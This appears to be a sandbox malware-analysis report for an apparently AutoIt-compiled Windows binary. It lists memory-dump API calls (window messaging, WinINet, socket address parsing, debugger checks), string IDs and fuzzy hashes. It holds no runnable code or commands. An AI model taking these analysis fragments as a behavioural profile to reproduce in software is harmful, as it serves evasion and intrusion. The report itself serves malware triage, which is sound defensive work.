                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                    • String ID: LPT
                                                                    • API String ID: 3222508074-1350329615
                                                                    • Opcode ID: 0ef431911c2077fa56400662ea2254776254a8a7aebb6c3f8ff608daa9a6ea9b
                                                                    • Instruction ID: b3c5b00f08ab8f6b92416826cbdda3d4a6918ec1fbf23213e72e564cf8442470
                                                                    • Opcode Fuzzy Hash: 0ef431911c2077fa56400662ea2254776254a8a7aebb6c3f8ff608daa9a6ea9b
                                                                    • Instruction Fuzzy Hash: DD61B271E00219AFCB14EF98C891EAEB7F9EF48714F44409AF996AB351D774AE40CB50
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00FE2968
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FE2981
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: a814185717c1d819b000da3ec4b0fa4f0ade0ba7f52399d9eafc10abc06ec80e
                                                                    • Instruction ID: 28d5bf32084756cdbc1946fe3f9f5e9eac86869f0c97d1566ecebe1905e448ac
                                                                    • Opcode Fuzzy Hash: a814185717c1d819b000da3ec4b0fa4f0ade0ba7f52399d9eafc10abc06ec80e
                                                                    • Instruction Fuzzy Hash: 685166724087489BD320EF50DC86BAFBBF8FB85340F85884EF2D881195DB758529DB66
                                                                    APIs
                                                                      • Part of subcall function 00FD4F0B: __fread_nolock.LIBCMT ref: 00FD4F29
                                                                    • _wcscmp.LIBCMT ref: 01039824
                                                                    • _wcscmp.LIBCMT ref: 01039837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    • Opcode ID: f55e06e08dc296587a336f80678be59339d89b4ec74b29a6a6094aeb456f621d
                                                                    • Instruction ID: 4b5e4e7643b719b8a33fe781c63a10fb33261be6c3f1717ecc9d8a07e647ff8c
                                                                    • Opcode Fuzzy Hash: f55e06e08dc296587a336f80678be59339d89b4ec74b29a6a6094aeb456f621d
                                                                    • Instruction Fuzzy Hash: DE41C571A0020ABBDF219BA4CC45FEFBBBDEFC5714F00006AF944A7290D6B5A9049B61
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0104259E
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010425D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |
                                                                    • API String ID: 1413715105-2343686810
                                                                    • Opcode ID: 883e48a927f8a978699aedb6072ef15ff8eebf760638ffd210d1b4607abe7fd9
                                                                    • Instruction ID: 3a692b65a2e415633c06a3a5eb49cd756b3344bf421f6c1b27436418e9389915
                                                                    • Opcode Fuzzy Hash: 883e48a927f8a978699aedb6072ef15ff8eebf760638ffd210d1b4607abe7fd9
                                                                    • Instruction Fuzzy Hash: 16315DB1900219EBCF01EFA5DC85EEEBFB9FF08340F04006AF954AA261EB355955DB50
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 01057B61
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01057B76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 7ed050a88dee7a39b964c4d09496f2fecebb02adcdb66b7f1b0c0c95acd401c1
                                                                    • Instruction ID: 5cb2b737feffa5e3f3d0db2810c55fa47c7bb96803df1239d6e5437eb34abb6a
                                                                    • Opcode Fuzzy Hash: 7ed050a88dee7a39b964c4d09496f2fecebb02adcdb66b7f1b0c0c95acd401c1
                                                                    • Instruction Fuzzy Hash: A8410A74A0130A9FDB54CFA9C981BDABBF9FB48300F50016AEE44AB346D771A951DF90
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 01056B17
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01056B53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: e84408ac4bdacf981605322d4348089470d978ccf33756f7ce00b25fccc4edd0
                                                                    • Instruction ID: 92d820556a7694cb3d8e8b50023602b456eb12d6c3fcc4d43abc5737c2d0b3be
                                                                    • Opcode Fuzzy Hash: e84408ac4bdacf981605322d4348089470d978ccf33756f7ce00b25fccc4edd0
                                                                    • Instruction Fuzzy Hash: 6331BE71200604AEEB519F69CC90BFB77F9FF48720F50861AFDE587190DA36A881DB60
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032911
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0103294C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 9ce105a05601ce552cb43bc04b91988eda115a1a96dc882f286745d88b3d9501
                                                                    • Instruction ID: 1f52971f2866b05bd12b1b26b90779ba8590e7648a9bea48690971eff7160572
                                                                    • Opcode Fuzzy Hash: 9ce105a05601ce552cb43bc04b91988eda115a1a96dc882f286745d88b3d9501
                                                                    • Instruction Fuzzy Hash: A631BD31A00309ABEB65CE5CCC85BAEBFECEF85390F14009AEAC5A61A1DB749540CB51
                                                                    APIs
                                                                    • __snwprintf.LIBCMT ref: 01043A66
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf_memmove
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                    • API String ID: 3506404897-2584243854
                                                                    • Opcode ID: 12fc83994ea0485d4810b8b59168ccd79d302fee905c4a7df545c92d55b31c14
                                                                    • Instruction ID: c53ce1e6430cdeab2498b87260f7a135d962f91e34774760115db71d9af8a1d8
                                                                    • Opcode Fuzzy Hash: 12fc83994ea0485d4810b8b59168ccd79d302fee905c4a7df545c92d55b31c14
                                                                    • Instruction Fuzzy Hash: 9D21F570A40229AFCF10FF64CC81EAE7BBABF44300F44446AE984AF241DB34E911DB61
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01056761
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0105676C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 253fefd9b4c5aae1cc4daa1bede2b97a6b98a58e16c7129917dd0264e22dfcad
                                                                    • Instruction ID: d5b3312e26ca621424cd4236e6f86c798d79ab7487396fe438662fcc3d437911
                                                                    • Opcode Fuzzy Hash: 253fefd9b4c5aae1cc4daa1bede2b97a6b98a58e16c7129917dd0264e22dfcad
                                                                    • Instruction Fuzzy Hash: 5A11B6752002096FEFA29E58CC84EBB77AAFB48364F500129FD9497291E6369C5187A0
                                                                    APIs
                                                                      • Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
                                                                      • Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
                                                                      • Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91
                                                                    • GetWindowRect.USER32(00000000,?), ref: 01056C71
                                                                    • GetSysColor.USER32(00000012), ref: 01056C8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: d5b3d8cd397ea8d0e30f86b68bc25e1dc4dd1f985c673380ac15d6dd43f181a6
                                                                    • Instruction ID: 02ba8245a34ad65a38f358c39bb50ce5fe979b07f0d30299eadb77a915384c94
                                                                    • Opcode Fuzzy Hash: d5b3d8cd397ea8d0e30f86b68bc25e1dc4dd1f985c673380ac15d6dd43f181a6
                                                                    • Instruction Fuzzy Hash: 1421177291020AAFDB55DFA8C845AFA7BA9FB08314F004619FD95D3240D63AE850DB60
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 010569A2
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010569B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: e69d319d69e7ce3cec9ac6a5f9e22dc3510e5fe35e1b2be8e981d1f464f9b04c
                                                                    • Instruction ID: 30e214d0f304926f006e0321028472136342819c5479483759bfa23fe5fa2873
                                                                    • Opcode Fuzzy Hash: e69d319d69e7ce3cec9ac6a5f9e22dc3510e5fe35e1b2be8e981d1f464f9b04c
                                                                    • Instruction Fuzzy Hash: 97116D71100205ABEF919E68DC40AEB37BEEB053B8F904714FDE1971D0C636DC519760
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032A22
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01032A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 1771b0fbf49e5ff808082453a02041e60fdabf5d2186e503c2602c35636d6cb3
                                                                    • Instruction ID: 1aea94964e54bb527d40103413a70d03625c6bb463c4b2c3d33cf29e9ca6716b
                                                                    • Opcode Fuzzy Hash: 1771b0fbf49e5ff808082453a02041e60fdabf5d2186e503c2602c35636d6cb3
                                                                    • Instruction Fuzzy Hash: FE110832901614ABEF71DE5CDC44BAE7BFCABC6200F144062EAD5E7290D774A907C791
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0104222C
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01042255
                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 01047FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,01047DB3,?,00000000,?,?), ref: 0104800D
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
• htons.WSOCK32(00000000,?,00000000), ref: 01047DF3
Strings
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
APIs
  • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
  • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01028E73
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
  • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 01028D6B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
  • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 01028DEE
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
Strings
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
APIs
  • Part of subcall function 0100B314: _memset.LIBCMT ref: 0100B321
  • Part of subcall function 00FF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0100B2F0,?,?,?,00FD100A), ref: 00FF0945
• IsDebuggerPresent.KERNEL32(?,?,?,00FD100A), ref: 0100B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FD100A), ref: 0100B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0100B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 01011775
  • Part of subcall function 0104BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0101195E,?), ref: 0104BFFE
  • Part of subcall function 0104BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0104C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0101196D
Strings
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0105596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01055981
  • Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010559AE
• PostMessageW.USER32(00000000), ref: 010559B5
  • Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461